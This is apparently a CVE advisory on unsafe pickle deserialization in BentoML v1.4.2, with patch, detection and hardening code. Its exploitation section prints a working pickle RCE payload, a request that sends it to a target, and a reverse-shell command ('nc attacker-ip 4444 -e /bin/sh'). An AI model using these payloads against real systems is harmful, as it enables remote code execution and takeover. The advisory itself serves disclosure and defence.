How the CVE Works
The vulnerability exists in BentoML v1.4.2 due to unsafe deserialization in serde.py. The `deserialize_value` function passes request data to Python's `pickle.loads()` without validation, so an attacker can craft a malicious serialized payload. When a manipulated HTTP request carrying serialized data reaches the server, it is deserialized, and the deserialization itself executes attacker-chosen code. Because the payload is untrusted and processed directly, this yields Remote Code Execution (RCE). The exploit relies on Python's `__reduce__` method on a malicious class: pickle calls the callable that `__reduce__` returns during deserialization, which is how system commands get executed.
DailyCVE Form
Platform: BentoML
Version: v1.4.2
Vulnerability: RCE via deserialization
Severity: Critical
Date: 2023-XX-XX
What Undercode Says:
Exploitation
1. Crafting Payload:

```python
import os
import pickle

class Exploit:
    def __reduce__(self):
        return (os.system, ('malicious-command',))

payload = pickle.dumps(Exploit())
```
2. Sending Payload:

```python
import requests

requests.post("http://target:3000/endpoint", data=payload,
              headers={'Content-Type': 'application/vnd.bentoml+pickle'})
```
3. Reverse Shell:

```bash
nc -lvnp 4444
```

Modify `__reduce__` to execute `nc attacker-ip 4444 -e /bin/sh`.
Protection
1. Patch:
Replace `pickle.loads()` with a safe deserializer like `json.loads()`.
2. Input Validation:

```python
def safe_deserialize(payload):
    # validate_payload is a placeholder for the application's own
    # schema/type check; the advisory does not define it.
    if not validate_payload(payload):
        raise ValueError("Invalid payload")
```
3. Network Controls:

```bash
iptables -A INPUT -p tcp --dport 3000 -s trusted-ip -j ACCEPT
```
4. Monitoring:

```bash
grep -r "pickle.loads" /path/to/bentoml
```
5. Workaround:
Disable affected endpoints until patched.
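A concrete form of steps 1 and 2 above, written as an added example for this advisory (not BentoML's code): a replacement `deserialize_value` that serves JSON, and for the `application/vnd.bentoml+pickle` content type only accepts data-only pickles. The pickle path is checked twice: a static opcode scan with `pickletools` (no execution) rejects any stream that references importable code, and a restricted `Unpickler` refuses every `find_class` lookup so a `__reduce__` callable can never be resolved. The endpoint name and sample bodies are assumptions constructed here.

```python
import io
import json
import pickle
import pickletools

# Opcodes that let a pickle stream look up or call code. A stream carrying only
# plain data (dicts, lists, strings, numbers) never needs any of them.
CODE_OPCODES = {"GLOBAL", "STACK_GLOBAL", "INST", "OBJ", "REDUCE", "NEWOBJ", "NEWOBJ_EX"}

class UnsafePayload(ValueError):
    """Raised when a request body must not be deserialized."""

def pickle_references_code(payload: bytes) -> bool:
    """Scan the opcode stream without executing it; malformed streams count as unsafe."""
    try:
        return any(op.name in CODE_OPCODES for op, _arg, _pos in pickletools.genops(payload))
    except Exception:
        return True

class NoGlobalsUnpickler(pickle.Unpickler):
    """Second layer: refuse every import the stream asks for, so __reduce__ targets
    such as os.system can never be resolved even if the scan were bypassed."""
    def find_class(self, module, name):
        raise UnsafePayload(f"pickle tried to import {module}.{name}")

def load_without_globals(body: bytes):
    return NoGlobalsUnpickler(io.BytesIO(body)).load()

def deserialize_value(content_type: str, body: bytes):
    """Hardened replacement for an endpoint that formerly called pickle.loads(body)."""
    if content_type == "application/json":
        return json.loads(body.decode("utf-8"))
    if content_type == "application/vnd.bentoml+pickle":
        if pickle_references_code(body):
            raise UnsafePayload("pickle payload references importable code")
        return load_without_globals(body)
    raise UnsafePayload(f"unsupported content type {content_type!r}")

# Constructed sample inputs (not captured traffic).
JSON_BODY = json.dumps({"input": [1, 2, 3]}).encode()
DATA_PICKLE = pickle.dumps({"input": [1, 2, 3]})   # plain data: accepted

class _ReduceDemo:
    # Same __reduce__ mechanism the advisory describes, bound to the harmless builtin len().
    def __reduce__(self):
        return (len, ("abc",))

REDUCE_PICKLE = pickle.dumps(_ReduceDemo())        # references code: rejected
```

A rejected pickle is a detection signal worth logging with the source address; the scan result is available before anything is executed.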
Detection
1. Log Analysis:

```bash
tail -f /var/log/bentoml.log | grep "deserialize_value"
```
2. YARA Rule:

```yara
rule bentoml_rce {
    strings:
        $pickle = "pickle.loads"
    condition:
        $pickle
}
```
Mitigation
- Upgrade to a fixed version.
- Restrict network access to BentoML services.
- Use Web Application Firewalls (WAF) to block suspicious pickle payloads.
References:
Reported By: https://github.com/advisories/GHSA-33xw-247w-6hmc